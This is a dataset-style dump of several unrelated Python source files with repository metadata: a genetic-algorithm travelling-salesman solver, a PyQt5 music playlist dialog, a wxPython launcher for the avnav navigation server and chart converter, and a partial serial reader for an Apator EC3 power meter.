] | 10 | 2020-08-08T16:35:40.000Z | 2022-03-08T00:07:19.000Z | geneal/applications/tsp/travelling_salesman_problem.py | NeveIsa/geneal | 064b0409912088886bf56fe9a729d74dac92a235 | [
"MIT"
] | 14 | 2020-08-07T20:49:18.000Z | 2022-03-31T17:55:47.000Z | import random
import time
from functools import reduce
import hashlib
from collections import defaultdict
import numpy as np
from numba import njit
from numba.core import types
from numba.typed import Dict
from geneal.applications.tsp.mutation_strategies import MutationStrategies
from geneal.genetic_algorithms import ContinuousGenAlgSolver
from geneal.utils.exceptions import InvalidInput
mutation_options = {"random_swap", "random_inversion", "2-opt"}
allowed_mutations = {
"2-opt",
"random_swap",
"random_inversion",
"random_gene_nearest_neighbour",
"worst_gene_random",
"worst_gene_nearest_neighbour",
"select_any_mutation",
}
@njit
def fitness_function(individual, edges):
"""
Implements the logic that calculates the fitness
measure of an individual. It sums all the costs of going
from node to node in the tour.
:param individual: chromosome of genes representing an individual
:param edges: dictionary with cost between all nodes
:return: the fitness of the individual
"""
total_length = 0
for i in range(individual.shape[0] - 1):
total_length += edges[(individual[i], individual[i + 1])]
total_length += edges[(individual[0], individual[-1])]
return -round(total_length, 2)
def convert_to_typed_dict(G):
edges_dict = Dict.empty(
key_type=types.UniTuple(types.int64, 2), value_type=types.float64
)
edges_dict.update({(edge[1], edge[0]): G.edges[edge]["weight"] for edge in G.edges})
edges_dict.update({(edge[0], edge[1]): G.edges[edge]["weight"] for edge in G.edges})
return edges_dict
class TravellingSalesmanProblemSolver(MutationStrategies, ContinuousGenAlgSolver):
def __init__(
self,
graph,
mutation_strategy: str = "2-opt",
n_searches: int = 1,
numba_speedup: bool = False,
*args,
**kwargs,
):
self.check_input(kwargs, graph)
MutationStrategies.__init__(self, n_searches=n_searches)
ContinuousGenAlgSolver.__init__(self, n_crossover_points=2, *args, **kwargs)
if mutation_strategy not in allowed_mutations:
raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
if numba_speedup:
edges_dict = convert_to_typed_dict(graph)
self.fitness_function = lambda individual: fitness_function(
individual, edges_dict
)
self.G = graph
self.mutation_strategy = mutation_strategy
self.fitness_time = 0
self.chromosomes = defaultdict(int)
@staticmethod
def check_input(kwargs, graph):
if "n_crossover_points" in kwargs:
if kwargs["n_crossover_points"] != 2:
print("Defaulting 'n_crossover_points' to 2")
kwargs.pop("n_crossover_points")
if "n_genes" in kwargs:
if kwargs["n_genes"] > len(graph.nodes):
print(
f"'n_genes' can't be larger than the nodes in the graph. The number of genes "
f"will default to {len(graph.nodes)}."
)
kwargs["n_genes"] = len(graph.nodes)
else:
kwargs["n_genes"] = len(graph.nodes)
return kwargs
def fitness_function(self, individual):
"""
Implements the logic that calculates the fitness
measure of an individual. It sums all the costs of going
from node to node in the tour.
:param individual: chromosome of genes representing an individual
:return: the fitness of the individual
"""
start_time = time.time()
arr_hash = hashlib.sha1(individual).hexdigest()
if arr_hash in self.chromosomes:
res = self.chromosomes[arr_hash]
else:
res = reduce(
lambda total_length, city_pair: total_length
+ self.G.edges[(city_pair[0], city_pair[1])]["weight"],
zip(individual, individual[1:]),
0,
)
res += self.G.edges[(individual[0], individual[-1])]["weight"]
res = -round(res, 2)
self.chromosomes[arr_hash] = res
self.fitness_time += time.time() - start_time
return res
def initialize_population(self):
"""
Initializes the population of the problem. It creates a
matrix of size (pop_size x n_genes) containing permutations of the nodes
on each row.
:return: a numpy array with a randomized initialized population
"""
population = np.repeat(
np.arange(1, self.n_genes + 1)[np.newaxis, :], self.pop_size, axis=0
)
return np.array(list(map(lambda x: np.random.permutation(x), population)))
def create_offspring(self, first_parent, sec_parent, crossover_pt, _):
"""
Creates an offspring from 2 parents. It performs an OX crossover, which
combines genes from each parent, but maintaining the nodes order of the parents.
http://www.inf.tu-dresden.de/content/institutes/ki/cl/study/summer14/pssai/slides/GA_for_TSP.pdf
:param first_parent: first parent's chromosome
:param sec_parent: second parent's chromosome
:param crossover_pt: points at which to perform the crossover
:return: the resulting offspring.
"""
reordered_sec_parent = np.roll(sec_parent, -crossover_pt[1])
new_arr = first_parent[crossover_pt[0] : crossover_pt[1]]
new_arr = np.append(new_arr, reordered_sec_parent)
_, idx = np.unique(new_arr, return_index=True)
res = np.roll(new_arr[np.sort(idx)], crossover_pt[0])
if res.shape[0] != 30:
a = 1
return res
def mutate_population(self, population, n_mutations, **kwargs):
"""
Mutates the population using a 2-opt rule hybrid. It selects the number of rows
on which mutation will be applied, and then a applies a local search 2-opt rule
to those rows.
:param population: the population at a given iteration
:param n_mutations: number of mutations to be performed. This number is
calculated according to mutation_rate, but can be adjusted as needed inside this function
:return: the mutated population
"""
adjusted_n_mutations = np.ceil(n_mutations / self.n_genes).astype(int)
if adjusted_n_mutations == 0:
return population
mutation_rows = self.get_mutation_rows(adjusted_n_mutations, population)
mutation_strategy = self.mutation_strategy
if "mutation_strategy" in kwargs:
mutation_strategy = kwargs["mutation_strategy"]
if mutation_strategy == "2-opt":
return self.two_opt_mutation(population, mutation_rows)
elif mutation_strategy == "random_swap":
mutation_cols = self.get_mutation_cols(adjusted_n_mutations, population)
return self.random_swap_mutation(population, mutation_rows, mutation_cols)
elif mutation_strategy == "random_gene_around_nearest_neighbour":
return self.random_gene_around_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "random_gene_nearest_neighbour":
return self.random_gene_nearest_neighbour_mutation(
population, mutation_rows
)
elif mutation_strategy == "worst_gene_random":
return self.worst_gene_random_mutation(population, mutation_rows)
elif mutation_strategy == "worst_gene_nearest_neighbour":
return self.worst_gene_nearest_neighbour_mutation(population, mutation_rows)
elif mutation_strategy == "random_inversion":
return self.random_inversion_mutation(
population,
mutation_rows,
np.random.choice(int(population.shape[1] / 2), 1)[0],
)
elif mutation_strategy == "select_any_mutation":
selected_strategy = random.sample(mutation_options, 1)[0]
return self.mutate_population(
population, n_mutations, **{"mutation_strategy": selected_strategy}
)
else:
raise (InvalidInput(f"{mutation_strategy} is an invalid mutation strategy"))
def find_worst_gene(self, chromosome):
distances = [
self.G.edges[(chromosome[-1], chromosome[0])]["weight"]
+ self.G.edges[(chromosome[0], chromosome[1])]["weight"],
*[
self.G.edges[(city_pair[0], city_pair[1])]["weight"]
+ self.G.edges[(city_pair[1], city_pair[2])]["weight"]
for city_pair in zip(chromosome, chromosome[1:], chromosome[2:])
],
self.G.edges[(chromosome[-2], chromosome[-1])]["weight"]
+ self.G.edges[(chromosome[-1], chromosome[0])]["weight"],
]
worst_gene = np.argmax(distances)
return worst_gene
| 31.929577 | 104 | 0.638619 | 1,089 | 9,068 | 5.115702 | 0.232323 | 0.063184 | 0.01436 | 0.037695 | 0.282714 | 0.225992 | 0.184348 | 0.17986 | 0.156166 | 0.132831 | 0 | 0.010563 | 0.269188 | 9,068 | 283 | 105 | 32.042403 | 0.830089 | 0.177658 | 0 | 0.069182 | 0 | 0 | 0.106451 | 0.0209 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0 | 0.075472 | 0 | 0.238994 | 0.012579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44aee10963b90c303639a9d3405aa32659f7cfd5 | 12,188 | py | Python | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | 2 | 2020-06-01T00:34:50.000Z | 2020-12-08T14:40:41.000Z | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | null | null | null | src/component/PlaylistDialog.py | renchangjiu/kon-windows | a20f33fc98cd197e1e601b5d97adecabee9176d8 | [
"MIT"
] | null | null | null | from PyQt5 import QtGui
from PyQt5.QtCore import Qt, QEvent, QModelIndex
from PyQt5.QtGui import QPixmap, QColor, QIcon, QCursor, QPainter, QPen
from PyQt5.QtWidgets import QWidget, QTableWidgetItem, \
QAction, QMenu, QLabel, QWidgetAction, QHBoxLayout
from src.Apps import Apps
from src.model.MusicList import MusicList
from src.ui.PlaylistDialogUI import Ui_Form
from src.util import util
class PlayListDialog(QWidget, Ui_Form):
def __init__(self, parent, ):
QWidget.__init__(self)
Ui_Form.__init__(self)
self.setupUi(self)
self.setParent(parent)
self.musicListService = Apps.musicListService
self.player = Apps.player
self.playlist = Apps.playlist
self.__init_ui()
self.__init_table_widget_ui()
self.__set_table_widget_width()
self.__initConnect()
def __initConnect(self):
self.playlist.changed.connect(self.onPlaylistChanged)
self.pushButton_2.clicked.connect(self.onClearBtnClicked)
self.tableWidget.cellPressed.connect(self.open_music_list)
self.tableWidget.doubleClicked.connect(self.onTableDoubleClicked)
self.tableWidget.customContextMenuRequested.connect(self.onRightClick)
def onPlaylistChanged(self):
playlist = self.playlist
self.setGeometry(self.parent().width() - 580, 150, 580,
self.parent().height() - 150 - 48)
self.tableWidget.clearContents()
self.tableWidget.setRowCount(playlist.size())
self.label.setText("共%d首" % playlist.size())
icon = QIcon("./resource/image/链接.png")
for i in range(playlist.size()):
self.btn_link = QLabel(self.tableWidget)
self.btn_link.setStyleSheet("background-color:rgba(0,0,0,0)")
self.btn_link.setPixmap(QPixmap("./resource/image/链接.png"))
self.btn_link.setAlignment(Qt.AlignCenter)
self.btn_link.setCursor(Qt.PointingHandCursor)
# self.btn_link.installEventFilter(self)
# icon_item = QTableWidgetItem()
# icon_item.setIcon(icon)
music = playlist.get(i)
self.tableWidget.setItem(i, 0, QTableWidgetItem("\t"))
self.tableWidget.setItem(i, 1, QTableWidgetItem(music.title))
self.tableWidget.setItem(i, 2, QTableWidgetItem(music.artist))
# self.tableWidget.setItem(i, 3, icon_item)
self.tableWidget.setCellWidget(i, 3, self.btn_link)
self.tableWidget.setItem(i, 4, QTableWidgetItem(util.format_time(music.duration)))
# 为当前音乐设置喇叭图标
icon_label = QLabel()
icon_label.setPixmap(QPixmap("./resource/image/musics_play.png"))
icon_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
icon_label.setCursor(Qt.PointingHandCursor)
self.tableWidget.setCellWidget(playlist.getIndex(), 0, icon_label)
# 当行数等于13时, maximum=0, row=14->maximum = 1, row=15->maximum=2, row=16->maximum=3
# 15-27
# print("table widget height: ", self.tableWidget.height())
# print("height: ", self.tableWidget.verticalScrollBar().height())
# print("maximum: ", self.tableWidget.verticalScrollBar().maximum())
# print("value:", self.tableWidget.verticalScrollBar().value())
# print("position:", self.tableWidget.verticalScrollBar().sliderPosition())
# self.tableWidget.verticalScrollBar().setSliderPosition(self.tableWidget.verticalScrollBar().maximum() / 2)
def onTableDoubleClicked(self, modelIndex: QModelIndex):
""" 当存放音乐列表的表格被双击 """
index = modelIndex.row()
self.playlist.setIndex(index)
self.player.play(self.playlist.getCurrentMusic())
self.tableWidget.selectRow(index)
def onClearBtnClicked(self):
""" 点击清空按钮 """
self.playlist.clear()
self.player.stop()
def open_music_list(self, row, column):
# 若点击的是链接按钮, 则跳转到对应的歌单页面
if column == 3:
music = self.playlist.get(row)
music_list = self.musicListService.get(music.mid)
self.parent().navigation.setFocus()
self.parent().navigation.setCurrentRow(2)
items = self.parent().navigation.findItems(music_list.name, Qt.MatchCaseSensitive)
item = None
for item_ in items:
data = item_.data(Qt.UserRole)
if music.mid == data.id:
item = item_
break
if item is not None:
data = item.data(Qt.UserRole)
self.parent().navigation.setCurrentItem(item)
self.parent().updateMusicList(data.id)
# 若是本地音乐
if data.id == 0:
self.parent().stackedWidget_2.setCurrentWidget(self.parent().local_music_page)
# 若是其他歌单
else:
self.parent().stackedWidget_2.setCurrentWidget(self.parent().music_list_detail)
self.parent().show_musics_data()
self.hide()
def onRightClick(self):
self.play_list_menu.clear()
act1 = self.create_widget_action("./resource/image/nav-播放.png", "播放(Enter)")
act2 = QAction("收藏到歌单(Ctrl+S)", self)
act3 = self.create_widget_action("./resource/image/打开文件.png", "打开文件所在目录")
act4 = self.create_widget_action("./resource/image/删除.png", "从列表中删除(Delete)")
self.play_list_menu.addAction(act1)
self.play_list_menu.addAction(act2)
# 获取被选中的行, 包括列
items = self.tableWidget.selectedItems()
# 被选中的行号
rows = set()
for item in items:
rows.add(item.row())
musics = []
for row in rows:
music = self.playlist.get(row)
musics.append(music)
# 只选中了一行
if len(rows) == 1:
self.play_list_menu.addAction(act3)
# 设置子菜单归属于act2
self.create_collect_menu(musics)
act2.setMenu(self.collect_menu)
self.play_list_menu.addMenu(self.collect_menu)
self.play_list_menu.addSeparator()
self.play_list_menu.addAction(act4)
act1.triggered.connect(lambda: self.parent().on_act_play(musics))
act3.triggered.connect(lambda: self.parent().on_act_open_file(musics))
act4.triggered.connect(lambda: self.onActDel(musics))
self.play_list_menu.exec(QCursor.pos())
def onActDel(self, musics: list):
cur = self.playlist.getCurrentMusic()
playing = False
for music in musics:
if music.path == cur.path and music.mid == cur.mid:
playing = True
for music in musics:
self.playlist.remove(music)
if playing:
self.parent().nextMusic()
def create_collect_menu(self, musics: list):
self.collect_menu.clear()
act0 = self.create_widget_action("./resource/image/添加歌单.png", "创建新歌单")
self.collect_menu.addAction(act0)
self.collect_menu.addSeparator()
mls = list(filter(lambda ml: ml.id != MusicList.DEFAULT_ID, self.musicListService.list_(MusicList())))
for music_list in mls:
act = self.create_widget_action("./resource/image/歌单.png", music_list.name, music_list)
self.collect_menu.addAction(act)
act.triggered.connect(lambda: self.parent().on_acts_choose(musics))
def __init_ui(self):
self.setWindowFlag(Qt.FramelessWindowHint)
self.tabWidget.setCurrentWidget(self.play_list)
self.tabWidget.tabBar().setCursor(Qt.PointingHandCursor)
self.tabWidget.setStyleSheet("QTabWidget::pane{border-top: 1px solid #e1e1e2;}" +
"QTabWidget::tab-bar{alignment:center;height:46px;}" +
"QTabBar::tab{height:26px;width:128px;border-radius:4px;}" +
"QTabBar::tab:selected{background-color:#7c7d86;color:#ffffff;}" +
"QTabBar::tab:!selected{background-color:#ffffff;color:#888888;}" +
"QTabBar::tab:!selected:hover{background:#f5f5f7;color:#666666;}"
)
self.widget.setStyleSheet(
"background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
self.label.setStyleSheet("border:none")
self.label_2.setStyleSheet("border:none")
self.widget_2.setStyleSheet(
"background:#f9f9f9;border:none;border-bottom:1px solid #efefef;border-left:1px solid #c3c3c4;")
self.pushButton.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
self.pushButton_2.setStyleSheet("QPushButton{color:#666666;border:none;}QPushButton:hover{color:#444444;}")
self.pushButton.setCursor(Qt.PointingHandCursor)
self.pushButton_2.setCursor(Qt.PointingHandCursor)
# 播放列表右键菜单
self.play_list_menu = QMenu()
# 鼠标移到收藏到歌单时的二级菜单
self.collect_menu = QMenu()
self.play_list_menu.setStyleSheet(
"QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
"QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
"QMenu::item:selected {background-color:#ededef;}" +
"QMenu::separator{background-color:#ededef;height:1px}")
self.collect_menu.setStyleSheet(
"QMenu{background-color:#fafafc;border:1px solid #c8c8c8;font-size:13px;width:214px;}" +
"QMenu::item {height:36px;padding-left:44px;padding-right:60px;}" +
"QMenu::item:selected {background-color:#ededef;}" +
"QMenu::separator{background-color:#ededef;height:1px}")
def __init_table_widget_ui(self):
self.tableWidget.setColumnCount(5)
self.tableWidget.setHorizontalHeaderLabels(["", "音乐标题", "歌手", "专辑", "时长"])
self.tableWidget.horizontalHeader().setHidden(True)
self.tableWidget.setStyleSheet("QTableWidget{border:none;border-left:1px solid #c0c0c1;background:#fafafa;}" +
"QTableWidget::item::selected{background-color:#e3e3e5}")
def __set_table_widget_width(self):
self.tableWidget.setColumnWidth(0, self.width() * 0.03)
self.tableWidget.setColumnWidth(1, self.width() * 0.63)
self.tableWidget.setColumnWidth(2, self.width() * 0.17)
self.tableWidget.setColumnWidth(3, self.width() * 0.05)
self.tableWidget.setColumnWidth(4, self.width() * 0.12)
def create_widget_action(self, icon, text, data=None):
act = QWidgetAction(self)
act.setText(text)
if data is not None:
act.setData(data)
widget = QWidget(self)
layout = QHBoxLayout()
layout.setContentsMargins(13, -1, -1, 11)
layout.setSpacing(13)
lb_icon = QLabel(widget)
lb_icon.resize(18, 18)
lb_text = QLabel(text, widget)
if icon != "":
lb_icon.setPixmap(QPixmap(icon))
widget.setStyleSheet("QWidget:hover{background:#ededef} QWidget{color:#000000;font-size:13px;}")
layout.addWidget(lb_icon)
layout.addWidget(lb_text)
layout.addStretch()
widget.setLayout(layout)
act.setDefaultWidget(widget)
return act
def eventFilter(self, QObject, QEvent_):
if self.btn_link == QObject:
if QEvent_.type() == QEvent.MouseButtonPress:
item = self.tableWidget.currentItem()
if item is not None:
pass
return super().eventFilter(QObject, QEvent_)
def paintEvent(self, QPaintEvent):
# 画出边框线
paint = QPainter()
paint.begin(self)
pen = QPen()
pen.setColor(QColor("#c3c3c4"))
paint.setPen(pen)
paint.drawLine(0, 0, self.width(), 0)
paint.drawLine(0, 0, 0, self.tabWidget.tabBar().height())
# 画出头部背景
brush = QtGui.QBrush(QColor("#f4f4f6"))
brush.setStyle(Qt.SolidPattern)
paint.setBrush(brush)
paint.drawRect(0, 0, self.width(), self.tabWidget.tabBar().height())
| 44.808824 | 118 | 0.628159 | 1,318 | 12,188 | 5.694234 | 0.254932 | 0.063957 | 0.017588 | 0.021319 | 0.214657 | 0.164823 | 0.136975 | 0.10553 | 0.10553 | 0.10553 | 0 | 0.025868 | 0.248277 | 12,188 | 271 | 119 | 44.97417 | 0.793277 | 0.065967 | 0 | 0.074074 | 0 | 0.018519 | 0.149894 | 0.1276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0.00463 | 0.037037 | 0 | 0.12037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b09eface0e025db8dfa1c9489702d2607f4f1d | 8,486 | py | Python | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | linux/avnav_gui.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2014 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
import optparse
import sys
import os
import wx
from avnav_gui_design import *
AVNAV_VERSION="development"
try:
from avnav_gui_version import AVNAV_VERSION
except:
pass
import subprocess
import re
__author__ = 'andreas'
class AvnavGui(Avnav):
def __init__(self, *args, **kwds):
Avnav.__init__(self, *args, **kwds)
self.defaultOut=os.path.join(os.path.expanduser("~"),"AvNavCharts")
self.serverbase=os.path.join(os.path.expanduser("~"),"avnav")
self.txLogfile.SetValue(os.path.join(self.defaultOut,"avnav-chartconvert.log"))
self.outputDir.SetValue(self.defaultOut)
self.server=None
self.serverRunning=False
self.converter=None
self.timer=wx.Timer(self,1)
self.Bind(wx.EVT_TIMER, self.OnTimer)
self.timer.Start(500)
self.urlmap=None
self.SetTitle("Avnav - %s"%(AVNAV_VERSION))
pass
def setServerBase(self, base):
self.serverbase=base
def setUrlMap(self, base):
self.urlmap = base
def btExitClicked(self, event):
self.terminateServer()
self.terminateConverter()
self.Close(True)
def getBaseDir(self):
dir=os.path.join(os.path.dirname(os.path.realpath(__file__)))
return dir
def doStartServer(self):
if self.checkServerRunning():
return
script=os.path.join(self.getBaseDir(),"..","server","avnav_server.py")
args=["xterm","-hold","-e",sys.executable,script,"-c",os.path.join(self.outputDir.GetValue(),"out")]
if self.urlmap is not None:
args.append("-u")
args.append(self.urlmap)
args.append("-w")
args.append(self.serverbase)
args.append(os.path.join(self.serverbase,"avnav_server.xml"))
self.server=subprocess.Popen(args,cwd=self.getBaseDir())
self.checkServerRunning()
def terminateServer(self):
if self.server is not None:
try:
self.server.terminate()
except:
pass
def checkServerRunning(self):
if self.server is not None:
try:
if self.server.poll() is None:
#still running
if not self.serverRunning:
self.serverPid.SetLabel(str(self.server.pid))
self.serverPid.SetForegroundColour(wx.Colour(0,255, 0))
self.btStartServer.SetLabel("Stop Server")
self.serverRunning=True
return True
except:
try:
self.server.terminate()
except:
pass
#seems to be not running
if self.serverRunning:
self.serverPid.SetLabel("server stopped")
self.serverPid.SetForegroundColour(wx.Colour(255,0, 0))
self.btStartServer.SetLabel("Start Server")
self.serverRunning=False
return False
def checkConverterRunning(self):
if self.converter is not None:
try:
if self.converter.poll() is None:
return True
#we stopped
if self.startServer.IsChecked():
self.doStartServer()
self.btStart.SetLabel("Start")
except:
self.btStart.SetLabel("Start")
try:
self.converter.terminate()
except:
pass
self.converter=None
return False
def terminateConverter(self):
if self.checkConverterRunning():
try:
self.converter.terminate()
except:
pass
def btStartServerClicked(self, event):
if self.serverRunning:
self.terminateServer()
self.checkServerRunning()
return
self.doStartServer()
def OnTimer(self,evt):
self.checkServerRunning()
self.checkConverterRunning()
def btSelectInputClicked(self, event):
openFileDialog = wx.FileDialog(self, "Select Chart files or directories", "", "",
"all (*.*)|*.*", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST|wx.FD_MULTIPLE)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
filenames=openFileDialog.GetPaths()
for name in filenames:
self.inputFiles.AppendText("\n"+name)
def btEmptyClicked(self, event):
self.inputFiles.Clear()
def btStartClicked(self, event):
if self.checkConverterRunning():
self.terminateConverter()
return
files=re.split("\n",self.inputFiles.GetValue())
selectedFiles=[]
for f in files:
if f != "":
selectedFiles.append(f)
if len(selectedFiles) < 1:
wx.MessageBox("no files selected")
return
log=[]
if self.cbLogfile.IsChecked():
pass
log=["-e" ,self.txLogfile.GetValue()]
args=["xterm","-T","Avnav Chartconvert","-hold","-e",os.path.join(self.getBaseDir(),"..","chartconvert","read_charts.py")]+log+[ "-b",self.outputDir.GetValue()]
if self.cbNewGemf.IsChecked():
args.append("-g")
if self.updateMode.IsChecked():
args.append("-f")
for name in selectedFiles:
args.append(name)
self.converter=subprocess.Popen(args,cwd=self.getBaseDir())
self.btStart.SetLabel("Stop")
self.checkConverterRunning()
def btOutDefaultClicked(self, event):
self.outputDir.SetValue(self.defaultOut)
def btSelectOutClicked(self, event):
openFileDialog = wx.DirDialog(self, "Select Output Dir", style=1,defaultPath=self.defaultOut)
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
self.outputDir.SetValue(openFileDialog.GetPath())
def btLogfileClicked(self, event):
openFileDialog = wx.FileDialog(self, "Select Logfile", style=1,defaultFile=self.txLogfile.GetValue())
if openFileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed idea...
self.txLogfile.SetValue(openFileDialog.GetPath())
if __name__ == "__main__":
app = wx.PySimpleApp(0)
#wx.InitAllImageHandlers()
argv=sys.argv
usage="usage: %s [-b basedir] [-v viewerbase] " % (argv[0])
parser = optparse.OptionParser(
usage = usage,
version="1.0",
description='avnav_gui')
parser.add_option("-b", "--basedir", dest="basedir", help="set the basedir for the server")
parser.add_option("-u", "--urlmap", dest="urlmap", help="set some urlmap for the server")
(options, args) = parser.parse_args(argv[1:])
frame_1 = AvnavGui(None, -1, "")
if not options.basedir is None:
frame_1.setServerBase(options.basedir)
if not options.urlmap is None:
frame_1.setUrlMap(options.urlmap)
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
| 36.895652 | 168 | 0.600283 | 929 | 8,486 | 5.427341 | 0.307858 | 0.01785 | 0.015867 | 0.013883 | 0.180087 | 0.12257 | 0.081515 | 0.047798 | 0.036692 | 0.036692 | 0 | 0.006312 | 0.27186 | 8,486 | 229 | 169 | 37.056769 | 0.809678 | 0.154018 | 0 | 0.359551 | 0 | 0 | 0.071234 | 0.003147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101124 | false | 0.039326 | 0.044944 | 0 | 0.219101 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44b155e14a6c99695a7fb8ef157cc096fe1beb35 | 8,162 | py | Python | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | 9 | 2018-03-11T20:46:31.000Z | 2022-03-28T13:28:43.000Z | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | null | null | null | powermeterapatorec3.py | grillbaer/data-logger | f0d5b878e8f4a2f8eafcc8453d8f3b42c210558d | [
"Apache-2.0"
] | 1 | 2020-05-03T07:15:08.000Z | 2020-05-03T07:15:08.000Z | """
Communication with APATOR EC3 power meter to get its actual readings.
"""
from __future__ import annotations
__author__ = 'Holger Fleischmann'
__copyright__ = 'Copyright 2021, Holger Fleischmann, Bavaria/Germany'
__license__ = 'Apache License 2.0'
import logging
import time
from typing import NamedTuple, Optional, Callable, List
import serial
from serial import SEVENBITS, PARITY_EVEN, SerialException
from utils import RepeatTimer
logger = logging.getLogger().getChild(__name__)
class PowerMeterReading(NamedTuple):
success: bool
consumption_total_sum_kwh: Optional[float]
consumption_high_sum_kwh: Optional[float]
consumption_low_sum_kwh: Optional[float]
class PowerMeterApatorEC3:
"""
Communication object to get readings from an APATOR EC3 electrical power meter.
Tested only with a 12EC3 two tariff version to get the readings for 1.8.1 and 1.8.2 OBIS values.
Unfortunately, this meter does not provide any actual effective power values.
Uses serial communication with the front IR interface.
Sends a request to the power meter and reads it's response, i.e. a bidirectional
TX/RX infrared interface must be connected to the serial port.
Communication needs quite long timeouts and delays because the meter is reaaaaally slow.
"""
serial_port: str
_serial: Optional[serial.Serial]
def __init__(self, serial_port: str):
"""
Create new communication object for power meter.
Does not yet open the serial port.
:param serial_port: serial port to use, e.g. "COM5" on Windows or "/dev/serialUSB0" on Linux
"""
self.serial_port = serial_port
self._serial = None
def open(self) -> None:
"""
Open the serial port if not open yet. Don't forget to close it when not needed any more.
:raises: serial.serialutil.SerialException
"""
if self._serial is None:
logger.info("Opening serial port " + self.serial_port)
self._serial = \
serial.Serial(self.serial_port,
baudrate=300, bytesize=SEVENBITS, parity=PARITY_EVEN,
timeout=10)
def close(self) -> None:
"""
Close the serial port if open.
"""
if self._serial is not None:
logger.info("Closing serial port " + self.serial_port)
self._serial.close()
self._serial = None
def read_raw(self) -> str:
"""
Read the raw response from the power meter.
:return: raw response string
:raises: serial.serialutil.SerialException if communication failed
"""
logger.debug("Sending request on serial port ...")
request = b'/?!\r\n'
self._serial.write(request)
self._serial.flush()
time.sleep(2)
ack_output = b'\x06000\r\n'
self._serial.write(ack_output)
self._serial.flush()
time.sleep(2)
logger.debug("Reading response from serial port ...")
data = self._serial.read(65536)
if len(data) > 0:
logger.debug("Response:\n" + data.decode("ascii"))
return data.decode("ascii")
def read(self) -> PowerMeterReading:
"""
Try to read values from the power meter. Automatically opens the serial interface
if not yet open. Closes it upon SerialException to force reopening on next attempt.
:return: reading with values for the case of success, empty reading in case of failure
"""
try:
self.open()
return self._parse_raw(self.read_raw())
except SerialException:
self.close()
return PowerMeterReading(False, None, None, None)
def _parse_raw(self, raw: str) -> PowerMeterReading:
high = None
low = None
for line in raw.splitlines(keepends=False):
cleaned = line.strip('\x02\x03\n\r \t')
if cleaned.startswith("1.8.1*"):
high = self._parse_line_float(cleaned)
elif cleaned.startswith("1.8.2*"):
low = self._parse_line_float(cleaned)
if high is not None and low is not None:
total = high + low
else:
total = None
return PowerMeterReading(True, total, high, low)
def _parse_line_str(self, cleaned_line: str) -> Optional[str]:
begin = cleaned_line.find("(") + 1
end = cleaned_line.rfind(")")
if begin != -1 and end != -1:
return cleaned_line[begin:end]
else:
return None
def _parse_line_float(self, cleaned_line: str) -> Optional[float]:
try:
